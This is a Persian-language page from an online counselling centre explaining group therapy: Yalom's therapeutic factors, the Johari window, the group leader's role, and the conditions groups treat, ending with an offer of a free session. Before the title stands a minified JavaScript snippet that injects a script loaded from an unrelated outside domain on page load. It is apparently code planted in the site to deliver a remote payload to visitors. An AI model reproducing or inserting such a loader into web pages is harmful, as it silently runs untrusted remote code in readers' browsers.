;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); گروه درمانی چیست؟ +روش کار آن + مزایای گروه درمانی | مرکز مشاوره آنلاین روان‌یاری

گروه درمانی

به گفتۀ اروین یالوم گروه درمانی نوع اثربخشی از روان درمانی است و دست کم به اندازۀ روان درمانی فردی در ایجاد پیامدهای ارزشمند موثر است. عناصر درمانی قابل توجهی در گروه درمانی موجب ایجاد و شکل‌گیری فرایند تغییر در درمانجویان می‌شوند؛ برای مثال امیدوار کردن، همگانی بودن تجارب انسانی، نوع‌دوستی، رفتار تقلیدی، یادگیری بین‌فردی و …

بسیاری از افراد می‌پندارند که رنج‌ و اندوه آنها منحصر به فرد است و این تنها آنها هستند که در مواجهه با شرایط دشوار دچار ترس، افکار و خیال‌پردازی یا اضطراب می‌شوند. قرار گرفتن در گروه و شنیدن احساسات و تجارب مشابه سایر اعضا به افراد کمک می‌کند تا از این انزوا و انحصار بیرون آمده و احساس آسودگی بیایند…

گروه درمانی چیست؟

افراد با تمام آسیب پذیری‌های خود و با تمام دفاع‌هایشان با سابقه‌ای از تعامل‌های کارآمد و ناکارآمد، با سبک دلبستگی ایمن/ناایمن با ترس هایشان و با پیشنه‌ای از موفقیت‌های کوچک/بزرگ و شکست‌های بزرگ/کوچک وارد گروه می‌شوند تا خود کاملتری را زیست کنند. تا در این تعامل جدید سازماندهی‌های جدیدی از «خود» ایجاد کنند. پویایی‎های گروه قرار است آنها را کمک کند تا آنچه طبق پنجره جوهاردی برایشان در نقطه کور و آنچه از دید دیگری در فضای پنهان است را بهتر ببینند و این همان گسترش آگاهی است.

افراد قرار است در متن فرآیندی مبتنی بر صداقت، رازداری و اعتماد بارهایی که سالها به دوش کشیده‌اند را زمین بگذارند و اجازه دهند دیگران نیز آن را ببینند و گروه و لیدر گروه لنگری هستند که اعضا در اکنون و اینجا بمانند.

با شنیدن تجربیات مشابه است که حس می کنند تنها نیستند و مسئله‌اشان منحصر به فرد نیست و امید و پذیرش و تاییدی که دریافت می کنند قدرت شفابخشی بی‎نظیری دارد.

قرار است در گروه درمانی شکل ارتباط فرد با خودش اصلاح شود و اساسا نکته این است که انسان چیزی فراتر از ارتباط نیست. اگر گذشته افراد سرشار از ناامنی‌هایی بوده که در روابط ناکارآمد تجربه کرده قرار است که در گروه شکل این ارتباط‌ها باز آفرینی شود و با تجربه ای سالم تر و کارآمدتر جایگزین شود. و فضای امن گروه قرار است که فرد را با بخش‌های مختلف خودش آشتی دهد.

لیدر گروه با صبوری و شنیدن فعال قدرت تاب آوری گروه رو بالا می‌برد احترام بی قید و شرط و توجه بدون قضاوت او الگوی سالم و کارآمدی است برای یادگیری مشاهده‌ای اعضا.

خودشناسی و دگر شناسی، دریافت بازخورد محتوا و هیجان، شنیده شدن و درک شدن و در امنیت بودن برای اینکه خود واقعی افراد نمود پیدا کند از شفابخش ترین اتفاق های گروه درمانی است اما همه اش این نیست .

گاه گروه درمانی فضای مفیدی برای افرادی است که مشکلِ مشترکی دارند تا از یکدیگر حمایت و مشاوره دریافت کنند. گروه درمانی از روان درمانی روانکاوی استفاده می‌کند. این نوع درمان تمرکز زیادی بر اینجا و اکنون دارد. گروه با راهنمایی درمانگر به چگونگی ارتباط گذشته با حال نگاه می‌کند. هدف گروه‌درمانی جلوگیری از درد و ناراحتی در آینده نیست، بلکه ایجاد ظرفیتی در فرد است تا او توانایی بیشتری برای مقابله با مشکلات و ناامیدی‌های زندگی خود داشته باشد. برخی از افراد ترجیح می دهند بخشی از یک گروه باشند و این نوع از درمان بهتر از درمان فردی برای آنها کار می‌کند. 

گروه درمانی نوعی روان درمانی است و می‌تواند به افراد کمک کند سلامت روان خود را بهبود بخشند؛ هدف آن کمک به افراد است تا شرایط سلامت روان خود را مدیریت کرده و با کار کردن بر روی تجربیات ناکارآمد گذشته به رفتارهای سازگارتری دست پیدا کنند. 

اگر به روان درمانی فکر می‌کنید، چندین گزینه در دسترس است. یکی از این گزینه‌ها گروه درمانی است. بسته به ماهیت مشکل شما، گروه درمانی می‌تواند یک انتخاب ایده آل برای رسیدگی به نگرانی‌های شما و ایجاد تغییرات مثبت در زندگی شما باشد.

در اصل، گروه درمانی به مجموعه‌ای از افراد اطلاق می‌شود که اغلب مسئله مشابهی دارند و طی جلساتی که به طور منظم تحت رهبری درمانگران آموزش دیده برگزار می‌شود با هم ملاقات می‌کنند. شاید فکر کنید گروه درمانی مختص مسائلی مانند اعتیاد به الکل است، اما باید بدانید گروه‌درمانی تقریبا می‌تواند برای تمام مشکلات سلامت روان استفاده شود.

چرا به گروه درمانی نیاز داریم ؟

گروه‌های درمانی با اهداف مختلفی تشکیل می‌شوند، برخی از آنها کار بر روی مشکل خاصی را هدف قرار می‎دهند.

 برای مثال افسردگی، اضافه وزن مفرط، اختلال هراس، اضطراب اجتماعی، دردهای مزمن یا سوء مصرف مواد… 

برخی دیگر هم به‌شکلی عمومی‌تر بر روی بهبود مهارت‌های اجتماعی تمرکز دارند برای مثال گروه به آنها کمک می‌کند تا در برابر مشکلاتی نظیر خجالتی بودن، خشم، احساس تنهایی یا عزت نفس پایین بهبود پیدا کنند

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.